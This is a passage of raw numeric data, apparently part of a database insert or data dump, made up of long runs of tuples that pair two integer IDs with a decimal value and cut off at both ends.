322,0.86331),(4626,1556323,1.16669),(4626,1556324,0.95669),(4626,1556325,1.00331),(4626,1556326,0.09331),(4721,1556326,0.09331),(4777,1556326,0.09331),(4626,1556327,0.98),(4626,1556328,1.4),(4626,1556329,0.88669),(4626,1556330,1.14331),(4626,1556331,0.23331),(4626,1556332,0.98),(4626,1556333,1.05),(4626,1556334,0.51331),(4626,1556335,1.14331),(4626,1556336,1.28331),(4626,1556337,0.32669),(4626,1556338,0.95669),(4626,1556339,1.16669),(4626,1556340,0.51331),(4626,1556341,1.12),(4626,1556342,1.16669),(4626,1556343,0.37331),(4626,1556344,0.95669),(4626,1556345,1.28331),(4626,1556346,1.12),(4626,1556347,1.28331),(4626,1556348,1.14331),(4626,1556349,1.21331),(4626,1556350,1.35331),(4626,1556351,1.4),(4626,1556352,1.23669),(4626,1556353,1.28331),(4626,1556354,1.21331),(4626,1556355,1.26),(4626,1556356,1.19),(4626,1556357,1.4),(4626,1556358,1.37669),(4626,1556359,1.4),(4626,1556360,1.21331),(4626,1556361,1.4),(4626,1556362,1.14331),(4626,1556363,1.28331),(4626,1556364,0.60669),(4917,1556364,0.60669),(4626,1556365,1.19),(4626,1556366,1.35331),(4626,1556367,1.21331),(4626,1556368,1.37669),(4626,1556369,0.37331),(4626,1556370,1.07331),(4626,1556371,1.35331),(4626,1556372,1.05),(4626,1556373,1.09669),(4626,1556374,0.32669),(4917,1556374,0.32669),(4626,1556375,0.93331),(4626,1556376,1.16669),(4626,1556377,0.46669),(4626,1556378,1.28331),(4626,1556379,1.4),(4626,1556380,0.42),(4626,1556381,0.95669),(4626,1556382,1.12),(4626,1556383,0.42),(4626,1556384,1.35331),(4626,1556385,1.4),(4626,1556705,1.12),(4626,1556706,1.35331),(4626,1556707,3.82676),(4626,1556708,4.01324),(4626,1556709,1.14331),(4626,1556710,1.33),(4626,1556711,0.88669),(4626,1556712,1.14331),(4626,1556713,0.98),(4626,1556714,1.14331),(4635,1558502,3),(4635,1558503,3.9334),(4635,1558520,1.24661),(4635,1558521,2.43661),(4635,1558522,2.89),(4669,1559044,1.14331),(4693,1559044,1.14331),(4741,1559044,1.14331),(4940,1559044,1.14331),(4653,1560612,2.4),(4653,1560613,3),(4653,1560614,0.5334),(4687,1560614,0.5334),(4653,1560670,2.43661),(4653,1560671,2.09661),(4653,1560672,2.77661),(4653,1560696,0.45339),(4664,1560696,0.45339),(4762,1560696,0.45339),(4732,1560696,0.64008),(4658,1560696,0.74676),(4734,1560696,0.93345),(4761,1560696,1.57353),(4653,1560697,2.09661),(4658,1560697,2.58993),(4653,1560698,2.32339),(4940,1560699,0.86331),(4653,1560699,2.09661),(4653,1560700,2.49339),(4658,1562886,1.05),(4658,1562887,1.21331),(4658,1562888,1.82),(4658,1562889,1.91338),(4658,1562890,0.21),(4658,1562902,0.91),(4658,1562903,1.02669),(4658,1562904,1.16669),(4658,1562905,1.21331),(4658,1562906,1.91338),(4658,1562907,2.1),(4658,1562908,0.93331),(4658,1562909,1.00331),(4658,1562910,0.21),(4658,1562911,0.91),(4658,1562912,0.95669),(4658,1563008,0.32669),(4658,1563009,1.00331),(4658,1563010,1.05),(4658,1563090,0.37338),(4761,1563090,0.56007),(4762,1563090,1.12014),(4658,1563091,1.72662),(4658,1563092,0.91),(4658,1563093,0.91),(4658,1563094,0.84),(4734,1563094,0.84),(4658,1563095,0.88669),(4658,1563096,0.91),(4658,1563097,1.82),(4658,1563098,0.60669),(4658,1563099,1.16669),(4658,1563100,1.28331),(4658,1563101,1.09669),(4658,1563102,1.33),(4658,1563103,0.86331),(4658,1563104,1.02669),(4658,1563105,0.98),(4658,1563106,1.12),(4693,1564383,0.28),(4761,1564383,0.28),(4678,1564383,0.68),(4672,1564842,0.68),(4672,1564843,2.60661),(4673,1564874,1.4666),(4673,1564875,3.4),(4673,1564876,3.9334),(4678,1565334,2.8666),(4678,1565335,3.4),(4678,1565336,2.55),(4678,1565337,3.00339),(4678,1565338,1.11),(4678,1565339,2.8666),(4678,1565340,3.0666),(4678,1565341,2.43661),(4678,1565342,2.60661),(4678,1565379,1.47339),(4678,1565380,2.66339),(4678,1565381,3.23),(4734,1565399,0.18669),(4678,1565399,0.45339),(4678,1565400,2.77661),(4678,1565401,3.17339),(4678,1565402,2.77661),(4678,1565403,3.23),(4687,1568593,2.5334),(4687,1568594,3.1334),(4687,1568605,1.02),(4687,1568606,2.72),(4687,1568607,3.23),(4693,1569275,0.46669),(4693,1569276,1.12),(4693,1569277,1.28331),(4693,1569288,1.8666),(4693,1569289,3.4666),(4693,1569290,4),(4693,1569328,0.37331),(4693,1569329,1.02669),(4693,1569330,1.09669),(4693,1569374,0.32669),(4693,1569375,0.93331),(4693,1569376,1.14331),(4693,1569377,1.00331),(4693,1569378,1.19),(4710,1592354,0.93331),(4710,1592355,1.14331),(4710,1592356,0.95669),(4710,1592357,1.14331),(4710,1592358,0.98),(4710,1592359,1.21331),(4710,1592360,0.81669),(4710,1592361,0.95669),(4710,1592362,0.51331),(4710,1592363,1.12),(4710,1592364,1.16669),(4710,1592365,0.37331),(4710,1592366,1.05),(4710,1592367,1.09669),(4710,1592368,1.40007),(4710,1592369,1.14331),(4710,1592370,1.4),(4710,1592371,2.24),(4710,1592372,1.35331),(4710,1592373,1.19),(4710,1592374,1.86),(4710,1592375,4.85677),(4710,1592376,1.16669),(4710,1592377,1.21331),(4710,1592378,0.28),(4734,1592378,0.28),(4710,1592379,0.88669),(4710,1592380,1.16669),(4710,1592381,0.32669),(4710,1592382,1.14331),(4710,1592383,1.33),(4710,1592384,0.42),(4710,1592385,1.12),(4710,1592386,1.35331),(4710,1592387,0.74662),(4710,1592388,1.96),(4710,1592389,1.28331),(4710,1592390,1.16669),(4710,1592391,0.37331),(4710,1592392,1.07331),(4710,1592393,1.30669),(4710,1592394,0.23331),(4710,1592395,0.88669),(4710,1592396,0.98),(4710,1592397,0.42),(4710,1592398,1.16669),(4710,1592399,1.4),(4710,1592400,0.32669),(4710,1592401,1.07331),(4710,1592402,1.23669),(4710,1592403,0.37331),(4710,1592404,1.07331),(4710,1592405,1.33),(4710,1592533,0.23331),(4849,1592533,0.23331),(4710,1592534,0.93331),(4710,1592535,1.16669),(4710,1592536,0.28),(4734,1592536,0.28),(4917,1592536,0.28),(4710,1592537,0.95669),(4710,1592538,1.09669),(4710,1592539,0.46669),(4710,1592540,1.14331),(4710,1592541,1.21331),(4710,1592542,0.84),(4710,1592543,1.09669),(4710,1592544,1.19),(4710,1592545,1.21331),(4710,1592546,1.4),(4710,1592547,1.05),(4710,1592548,1.26),(4710,1592549,1.05),(4710,1592550,1.33),(4710,1592551,0.84),(4710,1592552,0.93331),(4710,1592553,0.46669),(4710,1592554,1.16669),(4710,1592555,1.35331),(4710,1592556,0.7),(4710,1592557,1.4),(4710,1592558,1.4),(4710,1592559,0.46669),(4710,1592560,1.16669),(4710,1592561,1.23669),(4710,1592562,0.14),(4710,1592563,0.81669),(4710,1592564,0.95669),(4710,1592565,0.18669),(4710,1592566,1.00331),(4710,1592567,1.21331),(4721,1602919,2.8666),(4721,1602920,3.3334),(4721,1603209,0.95669),(4721,1603210,1.21331),(4721,1603211,0.91),(4721,1603212,1.02669),(4721,1603213,0.93331),(4721,1603214,1.05),(4721,1603215,0.88669),(4721,1603216,0.93331),(4721,1603217,0.98),(4721,1603218,1.05),(4721,1603219,0.88669),(4721,1603220,1.02669),(4721,1603221,0.91),(4721,1603222,1.00331),(4721,1603223,0.37331),(4721,1603224,1.05),(4721,1603225,1.28331),(4721,1603226,0.42),(4721,1603227,1.05),(4721,1603228,1.14331),(4721,1603229,0.95669),(4721,1603230,1.09669),(4721,1603231,1.00331),(4721,1603232,1.09669),(4721,1603233,0.91),(4721,1603234,1.00331),(4721,1603235,0.88669),(4721,1603236,1.02669),(4721,1603237,0.93331),(4721,1603238,1.02669),(4721,1603239,1.00331),(4721,1603240,1.05),(4721,1603241,0.93331),(4721,1603242,1.16669),(4721,1603243,0.84),(4721,1603244,1.05),(4721,1603245,0.93331),(4721,1603246,1.16669),(4721,1603247,0.95669),(4721,1603248,1.09669),(4721,1603249,0.88669),(4721,1603250,0.95669),(4721,1603251,0.46669),(4849,1603251,0.46669),(4721,1603252,1.09669),(4721,1603253,1.33),(4934,1603254,0.28),(4721,1603254,0.56),(4721,1603255,0.95669),(4721,1603256,1.23669),(4721,1603257,1.09669),(4721,1603258,1.16669),(4721,1603259,0.37331),(4803,1603259,0.37331),(4721,1603260,0.95669),(4721,1603261,1.14331),(4721,1603262,0.46669),(4721,1603263,1.09669),(4721,1603264,1.23669),(4721,1603265,0.46669),(4721,1603266,0.98),(4721,1603267,1.12),(4721,1603268,0.28),(4721,1603269,0.91),(4721,1603270,1.14331),(4721,1603271,0.51331),(4721,1603272,1.14331),(4721,1603273,1.23669),(4721,1603274,0.51331),(4721,1603275,1.07331),(4721,1603276,1.12),(4721,1603277,0.46669),(4721,1603278,1.00331),(4721,1603279,1.23669),(4721,1603280,0.51331),(4721,1603281,1.07331),(4721,1603282,1.21331),(4721,1603283,0.56),(4721,1603284,1.21331),(4721,1603285,1.28331),(4721,1603286,0.42),(4721,1603287,1.00331),(4721,1603288,1.16669),(4721,1603289,0.37331),(4721,1603290,1.02669),(4721,1603291,0.32669),(4721,1603292,1.00331),(4721,1603293,1.16669),(4721,1603294,0.42),(4721,1603295,1.05),(4721,1603296,1.19),(4721,1603297,0.23331),(4917,1603297,0.23331),(4721,1603298,0.88669),(4721,1603299,1.00331),(4721,1603300,0.32669),(4721,1603301,0.95669),(4721,1603302,1.05),(4721,1603303,0.28),(4721,1603304,0.88669),(4721,1603305,1.14331),(4721,1603306,0.23331),(4721,1603307,1.00331),(4721,1603308,1.23669),(4721,1603309,0.32669),(4721,1603310,0.93331),(4721,1603311,1.07331),(4721,1603312,0.46669),(4721,1603313,1.00331),(4721,1603314,1.12),(4721,1603315,0.18669),(4721,1603316,1.00331),(4721,1603317,1.23669),(4721,1603318,0.18669),(4721,1603319,0.86331),(4721,1603320,1.07331),(4777,1603321,0.18669),(4721,1603321,0.37338),(4721,1603322,0.95669),(4721,1603323,1.02669),(4721,1603324,0.91),(4721,1603325,0.98),(4721,1603326,1.02662),(4721,1603327,1.02669),(4721,1603328,1.07331),(4721,1603329,1.14331),(4721,1603330,1.21331),(4721,1603331,0.51331),(4721,1603332,1.23669),(4721,1603333,1.35331),(4721,1603334,0.46669),(4721,1603335,1.05),(4721,1603336,1.12),(4721,1603798,0.14),(4721,1603799,0.98),(4721,1603800,1.09669),(4721,1603801,0.28),(4721,1603802,0.98),(4721,1603803,1.05),(4721,1603804,0.23331),(4721,1603805,0.95669),(4721,1603806,1.14331),(4721,1603807,0.32669),(4721,1603808,1.09669),(4721,1603809,1.35331),(4721,1603810,0.18669),(4734,1603810,0.56007),(4721,1603811,1.00331),(4721,1603812,1.16669),(4721,1603813,0.60669),(4721,1603814,1.21331),(4721,1603815,1.4),(4721,1603816,0.37338),(4940,1603816,0.37338),(4773,1603816,0.45339),(4721,1603817,1.05),(4721,1603818,1.21331),(4721,1603819,0.95669),(4721,1603820,1.02669),(4721,1603821,0.23331),(4721,1603822,0.88669),(4721,1603823,1.05),(4723,1604960,1.92661),(4723,1604961,2.38),(4732,1613309,0.77),(4732,1613310,0.95669),(4732,1613311,0.86331),(4732,1613312,1.09669),(4732,1613313,0.86331),(4732,1613314,1.02669),(4732,1613315,1.00331),(4732,1613316,1.19),(4732,1613317,1.05),(4732,1613318,1.28331),(4732,1613329,0.93331),(4732,1613330,1.14331),(4732,1613331,0.88669),(4732,1613332,1.02669),(4732,1613333,0.93331),(4732,1613334,1.14331),(4732,1613335,0.93331),(4732,1613336,1.16669),(4732,1613493,0.32669),(4732,1613494,1.00331),(4732,1613495,1.33),(4732,1613639,0.23331),(4762,1613639,0.23331),(4732,1613640,0.93331),(4732,1613641,1.19),(4732,1613642,0.88669),(4732,1613643,1.14331),(4732,1613644,2.09661),(4732,1613645,2.55),(4732,1613646,0.32669),(4732,1613647,1.09669),(4732,1613648,1.14331),(4734,1615838,0.23331),(4734,1615839,0.95669),(4734,1615840,1.19),(4734,1615880,0.4),(4734,1615881,2.6666),(4734,1615882,3.0666),(4734,1616442,1.16669),(4734,1616443,0.84),(4734,1616444,0.98),(4734,1616445,0.93331),(4734,1616446,1.14331),(4734,1616447,0.91),(4734,1616448,1.12),(4734,1616449,0.88669),(4734,1616450,1.16669),(4734,1616451,0.84),(4734,1616452,1.00331),(4734,1616453,0.86331),(4734,1616454,1.07331),(4734,1616455,0.65331),(4734,1616456,1.09669),(4734,1616457,1.28331),(4734,1616458,0.37331),(4734,1616459,1.05),(4734,1616460,1.21331),(4734,1616461,0.28),(4803,1616461,0.68),(4734,1616462,0.95669),(4734,1616463,1.14331),(4734,1616464,0.32669),(4803,1616464,0.32669),(4734,1616465,1.14331),(4734,1616466,1.28331),(4734,1616467,0.28),(4917,1616467,0.28),(4734,1616468,0.93331),(4734,1616469,1.26),(4734,1616470,0.37331),(4917,1616470,0.37331),(4734,1616471,1.19),(4734,1616472,1.23669),(4734,1616473,0.37331),(4734,1616474,0.98),(4734,1616475,1.14331),(4734,1616476,0.51331),(4734,1616477,1.00331),(4734,1616478,1.28331),(4734,1616479,0.37331),(4734,1616480,1.14331),(4734,1616481,1.19),(4734,1616482,0.37331),(4734,1616483,0.95669),(4734,1616484,1.09669),(4734,1616485,0.42),(4734,1616486,0.95669),(4734,1616487,1.21331),(4734,1616488,0.23331),(4734,1616489,0.88669),(4734,1616490,1.02669),(4734,1616491,0.28),(4734,1616492,0.98),(4734,1616493,1.02669),(4734,1616494,0.7),(4734,1616495,1.33),(4734,1616496,1.4),(4734,1616497,0.23331),(4734,1616498,0.86331),(4734,1616499,1.07331),(4734,1616500,1.07331),(4734,1616501,1.23669),(4734,1616502,0.37331),(4734,1616503,1.07331),(4734,1616504,1.23669),(4734,1616505,0.46669),(4734,1616506,1.00331),(4734,1616507,1.19),(4734,1616508,1.24661),(4734,1616509,0.37331),(4734,1616510,0.93331),(4734,1616511,1.19),(4734,1616512,0.46669),(4734,1616513,1.14331),(4734,1616514,1.4),(4734,1616515,0.90661),(4734,1616516,2.72),(4734,1616517,2.89),(4734,1616518,0.32669),(4734,1616519,0.93331),(4734,1616520,1.14331),(4734,1616521,0.37331),(4734,1616522,0.98),(4734,1616523,1.26),(4734,1616524,0.23331),(4734,1616525,1.05),(4734,1616526,1.16669),(4734,1616527,0.23331),(4734,1616528,1.09669),(4734,1616529,1.30669),(4734,1616530,0.23331),(4734,1616531,0.86331),(4734,1616532,0.98),(4734,1616533,0.37338),(4734,1616534,2.00662),(4734,1616535,2.24),(4734,1616536,0.46669),(4734,1616537,1.09669),(4734,1616538,1.26),(4734,1616539,0.23331),(4734,1616540,0.88669),(4734,1616541,0.93331),(4734,1616542,0.32669),(4734,1616543,0.95669),(4734,1616544,1.14331),(4734,1616545,0.51331),(4734,1616546,1.07331),(4734,1616547,1.26),(4734,1616548,0.32669),(4734,1616549,0.93331),(4734,1616550,1.02669),(4734,1616551,0.18669),(4734,1616552,0.84),(4734,1616553,1.00331),(4734,1616554,0.42),(4734,1616555,1.21331),(4734,1616556,1.37669),(4803,1616557,0.32669),(4734,1616557,0.65338),(4734,1616558,1.12),(4734,1616559,1.26),(4734,1616560,1.00331),(4734,1616561,1.16669),(4734,1616562,0.46669),(4734,1616563,1.02669),(4734,1616564,1.07331),(4734,1617231,1.02669),(4734,1617232,1.16669),(4734,1617233,0.28),(4734,1617234,0.88669),(4734,1617235,1.00331),(4734,1617236,0.88669),(4734,1617237,1.16669),(4734,1617238,0.91),(4734,1617239,0.95669),(4734,1617240,0.86331),(4734,1617241,1.02669),(4734,1617242,0.84),(4734,1617243,0.98),(4734,1617244,0.88669),(4734,1617245,0.95669),(4734,1617246,1.07331),(4734,1617247,0.95669),(4734,1617248,1.21331),(4734,1617249,0.93331),(4734,1617250,0.98),(4734,1617251,0.91),(4734,1617252,1.12),(4734,1617253,0.84),(4734,1617254,1.00331),(4734,1617255,1.05),(4734,1617256,1.21331),(4734,1617257,0.98),(4734,1617258,1.26),(4734,1617259,0.74662),(4734,1617260,2.00662),(4734,1617261,1.12),(4734,1617262,1.07331),(4734,1617263,0.28),(4734,1617264,0.93331),(4734,1617265,1.16669),(4734,1617266,0.32669),(4734,1617267,1.12),(4734,1617268,1.30669),(4734,1617269,0.46669),(4734,1617270,1.05),(4734,1617271,1.12),(4734,1617272,0.46669),(4734,1617273,0.98),(4734,1617274,1.14331),(4734,1617275,0.28),(4734,1617276,1.12),(4734,1617277,1.26),(4734,1617278,0.32669),(4734,1617279,0.95669),(4734,1617280,1.23669),(4734,1617281,0.32669),(4734,1617282,1.00331),(4734,1617283,1.16669),(4734,1617284,0.42),(4734,1617285,1.05),(4734,1617286,1.14331),(4734,1617287,0.28),(4940,1617287,0.68),(4734,1617288,0.93331),(4734,1617289,1.16669),(4734,1617290,0.28),(4917,1617290,0.28),(4734,1617291,0.93331),(4734,1617292,1.05),(4734,1617293,0.32669),(4734,1617294,1.00331),(4734,1617295,1.21331),(4734,1617296,0.28),(4734,1617297,1.00331),(4734,1617298,1.16669),(4734,1617299,0.42),(4734,1617300,1.12),(4734,1617301,1.33),(4734,1617302,0.51331),(4734,1617303,1.12),(4734,1617304,1.26),(4734,1617305,1.23669),(4734,1617306,1.37669),(4734,1617307,0.74662),(4734,1617308,0.98),(4734,1617309,1.02669),(4734,1617310,1.05),(4734,1617311,1.33),(4734,1617312,0.56),(4734,1617313,1.21331),(4734,1617314,1.4),(4734,1617315,0.32669),(4734,1617316,1.00331),(4734,1617317,1.16669),(4734,1617318,1.00331),(4734,1617319,1.23669),(4734,1617320,1.14331),(4734,1617321,1.26),(4734,1617322,1.05),(4734,1617323,1.19),(4734,1617324,0.86331),(4734,1617325,0.98),(4734,1617326,0.28),(4734,1617327,0.95669),(4734,1617328,1.09669),(4734,1617329,0.18669),(4734,1617330,0.88669),(4734,1617331,0.98),(4734,1617332,0.32669),(4734,1617333,1.14331),(4734,1617334,1.23669),(4735,1617898,1.48),(4735,1617899,2.8666),(4735,1617900,3.0666),(4735,1617901,2.38),(4735,1617902,2.55),(4735,1617958,2.26661),(4735,1617959,2.89),(4735,1617961,2.38),(4735,1617962,2.66339),(4736,1618051,1.02669),(4940,1618051,1.02669),(4736,1618052,1.16669),(4940,1618052,1.16669),(4736,1618063,0.79339),(4736,1618064,2.94661),(4736,1618065,2.04),(4736,1618066,2.49339),(4762,1620500,0.42),(4761,1620500,0.84),(4761,1620501,1.05),(4762,1620501,1.05),(4761,1620502,1.30669),(4762,1620502,1.30669),(4761,1620503,0.37331),(4762,1620503,0.74662),(4761,1620504,1.07331),(4762,1620504,2.14662),(4761,1620505,1.35331),(4762,1620505,2.70662),(4762,1620832,1.02718),(4761,1620832,1.58746),(4762,1620833,19.5072),(4761,1620833,30.1475),(4762,1620834,12.0397),(4761,1620834,31.1026),(4761,1620835,1.09669),(4762,1620835,2.19338),(4761,1620836,2.14662),(4762,1620836,8.58648),(4762,1620837,2.94),(4761,1620837,4.62),(4762,1620838,22.05),(4761,1620838,33.6),(4762,1620839,24.0095),(4761,1620839,36.5859),(4749,1623522,0.86331),(4749,1623523,1.12),(4749,1623524,0.88669),(4851,1623524,0.88669),(4917,1623524,0.88669),(4749,1623525,0.93331),(4851,1623525,0.93331),(4753,1623628,0.21),(4852,1623628,0.21),(4753,1623629,1.05),(4753,1623630,1.30669),(4761,1626146,1.54),(4761,1626147,1.05),(4761,1626148,0.93331),(4761,1626149,0.77),(4761,1626150,0.98),(4761,1626151,1.00331),(4761,1626152,1.19),(4761,1626153,0.88669),(4761,1626154,1.12),(4761,1626155,0.86331),(4761,1626156,1.00331),(4761,1626157,0.93331),(4761,1626158,1.12),(4761,1626159,0.91),(4761,1626160,1.02669),(4761,1626161,0.7),(4761,1626162,0.98),(4761,1626163,1.14331),(4761,1626164,0.35),(4761,1626165,0.86331),(4761,1626166,0.91),(4761,1626167,0.21),(4761,1626168,0.81669),(4761,1626169,1.05),(4761,1626170,0.88669),(4761,1626171,1.00331),(4761,1626172,0.35),(4761,1626173,0.86331),(4761,1626174,0.91),(4761,1626175,0.98),(4761,1626176,1.16669),(4761,1626177,0.35),(4761,1626178,0.86331),(4761,1626179,0.91),(4761,1626180,0.14),(4761,1626181,0.88669),(4761,1626182,1.00331),(4761,1626183,0.35),(4761,1626184,0.86331),(4761,1626185,0.91),(4761,1626186,0.21),(4761,1626187,0.81669),(4761,1626188,1.05),(4761,1626189,0.14),(4761,1626190,0.88669),(4761,1626191,0.93331),(4761,1626229,1.72662),(4761,1626230,2.19338),(4761,1626231,1.91338),(4761,1626232,2.24),(4761,1626233,0.21),(4761,1626234,0.93331),(4761,1626235,0.98),(4761,1626236,0.35),(4761,1626237,0.86331),(4761,1626238,0.91),(4761,1626239,0.35),(4761,1626240,0.86331),(4761,1626241,0.91),(4761,1626242,0.14),(4761,1626243,0.88669),(4761,1626244,1.00331),(4761,1626651,1.00331),(4761,1626652,1.14331),(4761,1626653,0.95669),(4761,1626654,1.07331),(4761,1626655,0.84),(4761,1626656,0.98),(4761,1626657,0.95669),(4761,1626658,1.30669),(4761,1626659,0.84),(4761,1626660,0.98),(4761,1626661,0.88669),(4761,1626662,0.98),(4761,1626663,0.93331),(4761,1626664,1.21331),(4761,1626665,0.95669),(4761,1626666,1.05),(4761,1626667,0.86331),(4761,1626668,1.12),(4761,1626669,0.32669),(4761,1626670,1.19),(4761,1626671,1.28331),(4761,1626672,1.12),(4761,1626673,1.26),(4761,1626674,0.37331),(4761,1626675,1.12),(4761,1626676,1.21331),(4761,1626677,0.46669),(4761,1626678,1.14331),(4761,1626679,1.26),(4761,1626680,1.68),(4761,1626681,1.21331),(4761,1626682,1.4),(4761,1626683,1.14331),(4761,1626684,1.28331),(4761,1626685,1.12),(4761,1626686,1.28331),(4761,1626687,1.16669),(4761,1626688,1.21331),(4761,1627217,1.00331),(4761,1627218,1.16669),(4761,1627219,1.02669),(4761,1627220,1.16669),(4761,1627221,1.02669),(4761,1627222,1.26),(4761,1627223,1.07331),(4761,1627224,1.23669),(4761,1627225,0.86331),(4761,1627226,1.02669),(4761,1627227,1.23669),(4761,1627228,0.98),(4761,1627229,1.14331),(4761,1627230,0.93331),(4761,1627231,1.19),(4761,1627232,1.02669),(4761,1627233,1.19),(4761,1627234,0.88669),(4761,1627235,1.14331),(4761,1627236,0.46669),(4761,1627237,1.09669),(4761,1627238,1.23669),(4761,1627239,0.32669),(4761,1627240,1.12),(4761,1627241,1.4),(4761,1627242,1.07331),(4761,1627243,1.23669),(4761,1627244,0.32669),(4761,1627245,1.07331),(4761,1627246,1.28331),(4761,1627247,0.46669),(4837,1627247,1.13339),(4761,1627248,1.21331),(4761,1627249,1.35331),(4761,1627250,0.42),(4761,1627251,1.16669),(4761,1627252,1.35331),(4761,1627253,0.60669),(4761,1627254,1.26),(4761,1627255,1.4),(4761,1627256,0.37331),(4761,1627257,1.02669),(4761,1627258,1.35331),(4761,1627259,0.37331),(4761,1627260,1.00331),(4761,1627261,1.28331),(4762,1628017,0.91),(4762,1628018,1.12),(4762,1628019,0.93331),(4762,1628020,1.09669),(4762,1628021,0.7),(4762,1628022,0.98),(4762,1628023,1.14331),(4762,1628024,0.7),(4762,1628025,0.98),(4762,1628026,1.14331),(4762,1628036,1.00331),(4762,1628037,1.16669),(4762,1628038,0.95669),(4762,1628039,1.12),(4762,1628040,1.00331),(4762,1628041,1.19),(4762,1628042,0.95669),(4762,1628043,1.19),(4762,1628266,0.91),(4762,1628267,1.05),(4762,1628268,0.56),(4762,1628269,1.12),(4762,1628270,1.37669),(4762,1628271,0.37331),(4762,1628272,1.14331),(4762,1628273,1.23669),(4762,1628274,0.37331),(4762,1628275,1.00331),(4762,1628276,1.30669),(4762,1628277,0.42),(4762,1628278,0.95669),(4762,1628279,1.09669),(4762,1628280,1.96),(4762,1628281,2.24),(4762,1628518,0.98),(4762,1628519,1.30669),(4762,1628520,1.02669),(4762,1628521,1.21331),(4762,1628522,2.00662),(4762,1628523,2.28662),(4762,1628524,1.05),(4762,1628525,1.23669),(4762,1628526,1.00331),(4762,1628527,1.14331),(4762,1628528,0.98),(4762,1628529,1.4),(4762,1628530,0.37331),(4762,1628531,1.12),(4762,1628532,1.37669),(4762,1628533,0.46669),(4762,1628534,1.16669),(4762,1628535,1.33),(4764,1629057,1.98339),(4764,1629058,2.43661),(4764,1629059,1.21331),(4928,1629059,1.21331),(4951,1629059,1.21331),(4770,1629213,2.09661),(4770,1629214,2.38),(4770,1629218,0.56661),(4776,1629340,1.02),(4776,1629341,2.49339),(4776,1629342,0.90661),(4776,1629343,2.72),(4776,1629344,3.00339),(4777,1629500,0.79331),(4777,1629501,0.93331),(4777,1629502,0.86331),(4777,1629503,0.91),(4777,1629504,0.81669),(4777,1629505,1.05),(4777,1629506,0.88669),(4777,1629507,0.98),(4777,1629508,0.93331),(4777,1629509,1.07331),(4777,1629510,0.42),(4777,1629511,0.98),(4777,1629512,1.07331),(4777,1629513,0.51331),(4777,1629514,1.09669),(4777,1629515,1.21331),(4777,1629516,1.00331),(4777,1629517,1.19),(4777,1629518,0.95669),(4777,1629519,1.00331),(4777,1629520,0.23331),(4777,1629521,1.02669),(4777,1629522,1.23669),(4777,1629523,1.00331),(4777,1629524,1.12),(4777,1629525,0.37331),(4777,1629526,0.93331),(4777,1629527,1.00331),(4777,1629528,0.18669),(4777,1629529,0.86331),(4777,1629530,1.02669),(4777,1629663,0.37338),(4777,1629664,1.07331),(4777,1629665,1.21331),(4777,1629666,0.91),(4777,1629667,1.12),(4777,1629668,0.18669),(4777,1629669,1.00331),(4777,1629670,1.16669),(4778,1629869,0.68),(4780,1629951,0.6666),(4780,1629952,2.5334),(4780,1629953,3.2),(4780,1629963,1.05),(4798,1643133,0.21),(4798,1643134,0.88669),(4798,1643135,0.93331),(4798,1643136,0.14),(4798,1643137,0.98),(4798,1643138,1.19),(4798,1643147,1.68),(4798,1643148,1.96),(4798,1643149,0.93331),(4798,1643150,1.12),(4798,1643334,0.14),(4798,1643335,0.98),(4798,1643336,1.19),(4798,1643337,1.72662),(4798,1643338,1.19),(4798,1643339,1.21331),(4798,1643340,0.51331),(4798,1643341,1.16669),(4798,1643342,1.4),(4798,1643343,1.02662),(4798,1643344,1.16669),(4798,1643345,1.33),(4798,1643346,1.16669),(4798,1643347,1.37669),(4798,1643348,1.11993),(4798,1643349,1.86662),(4798,1643350,1.02669),(4798,1643351,1.12),(4798,1643352,0.93331),(4798,1643353,1.09669),(4798,1643354,0.46669),(4798,1643355,1.05),(4798,1643356,1.26),(4798,1643357,0.93338),(4798,1643358,1.96),(4798,1643359,1.16669),(4798,1643360,1.07331),(4798,1643663,0.28),(4798,1643664,1.63338),(4798,1643665,0.93331),(4798,1643666,0.95669),(4798,1643667,4.2),(4798,1643668,3.82676),(4798,1643669,0.98),(4798,1643670,0.46669),(4798,1643671,0.98),(4798,1643672,1.02669),(4798,1643673,0.93338),(4798,1643674,0.98),(4798,1643675,1.09669),(4798,1643676,1.02669),(4798,1643677,1.23669),(4798,1643678,0.74662),(4798,1643679,1.86662),(4798,1643680,1.96),(4798,1643681,0.32669),(4798,1643682,1.14331),(4798,1643683,1.4),(4798,1643684,0.37338),(4798,1643685,1.00331),(4798,1643686,1.21331),(4798,1643687,1.05),(4798,1643688,1.19),(4798,1643689,0.95669),(4798,1643690,1.23669),(4798,1643691,0.37331),(4798,1643692,1.07331),(4798,1643693,1.30669),(4798,1643694,1.30662),(4798,1643695,2.52),(4798,1643696,1.4),(4798,1643697,1.30669),(4798,1643698,0.60669),(4798,1643699,1.14331),(4798,1643700,1.21331),(4798,1643701,0.51331),(4798,1643702,1.14331),(4798,1643703,1.35331),(4798,1643704,0.60669),(4798,1643705,1.28331),(4798,1643706,1.4),(4798,1643707,0.51331),(4798,1643708,1.14331),(4798,1643709,1.35331),(4798,1643710,0.18669),(4798,1643711,0.93331),(4798,1643712,1.12),(4803,1644927,0.4),(4803,1644928,2.6666),(4803,1644994,0.84),(4803,1644995,1.05),(4803,1644996,1.07331),(4803,1644997,1.37669),(4803,1644998,0.32669),(4803,1644999,1.05),(4803,1645000,1.19),(4803,1645001,1.05),(4803,1645002,1.19),(4803,1645003,0.23331),(4803,1645004,0.88669),(4803,1645005,1.16669),(4803,1645006,0.23331),(4927,1645006,0.23331),(4803,1645007,1.14331),(4927,1645007,1.14331),(4803,1645008,1.26),(4927,1645009,0.79339),(4803,1645009,1.44677),(4927,1645010,2.89),(4803,1645010,5.27),(4803,1645011,1.4),(4927,1645012,3.17339),(4803,1645012,4.48008),(4803,1645013,0.37331),(4803,1645014,1.12),(4803,1645015,1.37669),(4803,1645016,1.02669),(4803,1645017,1.19),(4803,1645095,0.23331),(4849,1645095,0.23331),(4803,1645096,0.93331),(4803,1645097,1.14331),(4803,1645098,0.28),(4803,1645099,0.91),(4803,1645100,1.12),(4806,1645256,2.6666),(4806,1645257,3),(4806,1645258,2.21),(4806,1645259,2.49339),(4809,1645390,2.6666),(4814,1645576,1.4666),(4814,1645577,3.2666),(4814,1645578,3.4666),(4814,1645612,2.60661),(4814,1645613,3.00339),(4814,1645614,2.32339),(4814,1645615,3.00339),(4837,1646499,2.15339),(4837,1646500,2.43661),(4837,1646520,1.92661),(4837,1646521,2.32339),(4837,1646524,2.43661),(4837,1646525,2.55),(4839,1646609,0.42),(4847,1646609,0.42),(4857,1646609,0.42),(4839,1646610,1.16669),(4847,1646610,1.16669),(4857,1646610,1.16669),(4839,1646611,1.37669),(4847,1646611,1.37669),(4857,1646611,1.37669),(4839,1646612,0.88669),(4839,16466